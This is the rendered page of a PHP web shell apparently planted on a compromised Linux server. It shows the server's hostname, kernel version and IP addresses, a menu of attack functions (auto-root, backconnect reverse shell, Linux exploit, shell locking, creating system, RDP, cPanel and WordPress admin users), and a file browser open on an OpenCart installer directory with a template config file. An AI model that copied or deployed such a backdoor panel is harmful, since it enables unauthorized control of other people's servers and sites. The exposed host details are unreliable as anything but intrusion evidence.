Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.129.42.59
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
ocart2 /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
3.22
KB
-rw-r--r--
config.php
1.01
KB
-rw-r--r--
config_.php
1.22
KB
-rw-r--r--
edit.php
4.46
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
104
B
-rw-r--r--
import.php
4.43
KB
-rw-r--r--
info.xml
2.51
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
8.87
KB
-rw-r--r--
install.xml
2.1
KB
-rw-r--r--
md5
1.38
KB
-rw-r--r--
notes.txt
2.06
KB
-rw-r--r--
upgrade.php
3.62
KB
-rw-r--r--
upgrade.xml
338
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config_.php
<?php // HTTP define('HTTP_SERVER', '[[softurl]]/admin/'); define('HTTP_CATALOG', '[[softurl]]/'); // HTTPS define('HTTPS_SERVER', '[[softurl]]/admin/'); define('HTTPS_CATALOG', '[[softurl]]/'); // DIR define('DIR_APPLICATION', '[[real_softpath]]/admin/'); define('DIR_SYSTEM', '[[real_softpath]]/system/'); define('DIR_IMAGE', '[[real_softpath]]/image/'); define('DIR_STORAGE', '[[softdatadir]]/storage/'); define('DIR_CATALOG', '[[real_softpath]]/catalog/'); define('DIR_LANGUAGE', DIR_APPLICATION . 'language/'); define('DIR_TEMPLATE', DIR_APPLICATION . 'view/template/'); define('DIR_CONFIG', DIR_SYSTEM . 'config/'); define('DIR_CACHE', DIR_STORAGE . 'cache/'); define('DIR_DOWNLOAD', DIR_STORAGE . 'download/'); define('DIR_LOGS', DIR_STORAGE . 'logs/'); define('DIR_MODIFICATION', DIR_STORAGE . 'modification/'); define('DIR_SESSION', DIR_STORAGE . 'session/'); define('DIR_UPLOAD', DIR_STORAGE . 'upload/'); // DB define('DB_DRIVER', 'mysqli'); define('DB_HOSTNAME', '[[softdbhost]]'); define('DB_USERNAME', '[[softdbuser]]'); define('DB_PASSWORD', '[[softdbpass]]'); define('DB_DATABASE', '[[softdb]]'); define('DB_PORT', '3306'); define('DB_PREFIX', '[[dbprefix]]'); // OpenCart API define('OPENCART_SERVER', 'https://www.opencart.com/');
Close